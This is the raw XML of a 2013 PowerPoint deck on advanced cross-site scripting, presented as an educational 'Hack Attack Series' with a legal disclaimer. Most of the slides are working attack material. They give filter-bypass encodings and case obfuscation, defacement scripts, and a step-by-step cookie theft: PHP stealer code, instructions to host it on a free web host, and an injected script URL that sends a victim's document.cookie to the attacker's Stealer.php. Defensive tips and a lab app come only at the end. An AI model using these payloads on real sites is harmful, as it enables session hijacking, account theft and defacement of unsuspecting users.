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3653616-3C08-4B55-85FF-F4C77A5D7BB8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/23/2013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E27A8DB-C067-4800-891F-7D47534945B1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miumwebbloghosting.com/2012/03/how-to-install-apache-server-on-windows.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/bodgeit/downloads/l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reakthesecurity.com/2012/01/ethical-hacking-lab-to-test-and-learn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Hack Attack Series: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced XSS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Stealing a Cookie with XSS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Paste the PHP code into a text document. i.e. Stealer.txt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Save another .txt for your log. Leave it blank for now. i.e. Log.txt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Stealer.txt will steal the cookie, Log.txt will store the stolen cookie’s data.</a:t>
            </a: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660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Stealing a Cookie with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Register in a free web-hosting service and login into your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cpanel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t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Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cpanel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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Upload the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and log.txt to root folder or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> folder.</a:t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Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the stealer will be at hxxp://www.YourSite.com/Stealer.php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8395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Stealing a Cookie with XSS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Now that the exploit is ready, inject it into a vulnerable site. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hxxp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.VulnerableSite.com/index.php?search=&lt;script&gt;location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;&lt;/script&gt;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28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How the exploit will function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>
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> if you inject this code in Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it will be there forever </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unless an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>removes it.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  It will be shown to all users. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whoever </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit the page, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will become a victim.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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected: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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ttacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS .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42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Tips to avoid XSS Attacks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Use No-Script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add-on. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is best protection to stay away from XSS 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Never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on a URL Shortener.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all cookies in your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser regularly and use the internet via through Proxies (i.e. Tor Network), VPN, etc.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Download the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bogedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> app (a vulnerable application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://code.google.com/p/bodgeit/downloads/list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Unzip it (WinZip, 7-Zip,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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as a java applet in Eclipse or run it on an Apache Tomcat Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Follow this guide for installing tomcat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www.premiumwebbloghosting.com/2012/03/how-to-install-apache-server-on-windows.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And this guide for attacking with tomcat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www.breakthesecurity.com/2012/01/ethical-hacking-lab-to-test-and-learn.html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FIN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7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C000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DISCLAIMER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Hacking is only legal under the following  circumstances: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FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>You hack (penetration test) a device/network you own.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FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>You gain explicit, documented permission from an individual, assumedly a friend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>You acquire an Ethical Hacker Certification and hack for a public or private sector organization with explicit permission to do so.  This is the safest of the three methods.</a:t>
            </a:r>
          </a:p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 Hacking is illegal in all other circumstances. Hackers can be charged with fines, misdemeanors, and/or felonies depending on severity and accounts of hacks. For these reasons I will not be demonstrating any live hacking attempts in the wild.</a:t>
            </a:r>
          </a:p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For more information</a:t>
            </a:r>
          </a:p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http://definitions.uslegal.com/c/computer-hacking/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC00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6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hackertarget.com/xss-simple-tutori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8818"/>
            <a:ext cx="7776431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97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Bypassing XSS Filters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Sometimes websites use XSS Filters such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty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to block XSS code. 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For example, magic quotes would have discovered our attempt to change the screen text in the last presentation, and changed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>script&gt;alert(&gt;xss detected&lt;)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>after using the exit character to stop the sequence.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There are ways around this however. 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66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Main Method: ASCII and HEX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Most XSS filters are only configured to filter plain text XSS codes.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Typing the codes in ASCII or HEX will usually circumnavigate this problem.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The Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addon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HackBar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://centricle.com/tools/ascii-hex/ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are two good resources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for conversion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="36576" indent="0">
              <a:buNone/>
            </a:pP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29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Examples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Plain Text: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>("hi");&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ASCII: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(97</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59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solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEX: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>hxxp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38927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Alternate Method: Obfuscation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Although it rarely works, obfuscation is the easiest method to bypass a filter.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Obfuscation: Hiding interpreted meaning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For XSS, all this means is changing the casing of your command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Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ScRipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALeRt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("hi");&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sCRipT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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2202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Defacing a Website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Note: Only Persistent XSS is defaceable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once your exploit has been shown to work, you have free reign over the website. The following code snippets illustrate how to change the background color and upload a photo, and how to attach a link your own webpage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.body.bgColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="red";&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.body.background</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>http://your_image.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>";&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="http://www.pastehtml.com/Your_Defacement_link";&lt;/script&gt;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77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Stealing a Cookie with XSS: The Cookie Stealing Code (PHP)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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("HTTP_CLIENT_IP") &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcasecmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("HTTP_CLIENT_IP"), "unknown")) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("HTTP_CLIENT_IP"); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    else if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("HTTP_X_FORWARDED_FOR") &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcasecmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("HTTP_X_FORWARDED_FOR"), "unknown")) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("HTTP_X_FORWARDED_FOR"); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    else if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("REMOTE_ADDR") &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcasecmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("REMOTE_ADDR"), "unknown")) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("REMOTE_ADDR"); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    else if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_SERVER['REMOTE_ADDR']) &amp;&amp; $_SERVER['REMOTE_ADDR'] &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcasecmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($_SERVER['REMOTE_ADDR'], "unknown")) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = $_SERVER['REMOTE_ADDR']; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    else </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "unknown";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8383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102</TotalTime>
  <Words>614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Hack Attack Series:  Advanced XSS Attack</vt:lpstr>
      <vt:lpstr>DISCLAIMER</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bypassing XSS Filters</vt:lpstr>
      <vt:lpstr>Main Method: ASCII and HEX</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Alternate Method: Obfuscation</vt:lpstr>
      <vt:lpstr>Defacing a Website</vt:lpstr>
      <vt:lpstr>Stealing a Cookie with XSS: The Cookie Stealing Code (PHP)</vt:lpstr>
      <vt:lpstr>Stealing a Cookie with XSS</vt:lpstr>
      <vt:lpstr>Stealing a Cookie with XSS</vt:lpstr>
      <vt:lpstr>Stealing a Cookie with XSS</vt:lpstr>
      <vt:lpstr>How the exploit will function </vt:lpstr>
      <vt:lpstr>Tips to avoid XSS Attacks</vt:lpstr>
      <vt:lpstr>Practice</vt:lpstr>
      <vt:lpstr>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</dc:creator>
  <cp:lastModifiedBy>Collin</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-21T04:50:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-23T05:50:03Z</dcterms:modified>
</cp:coreProperties>
</file>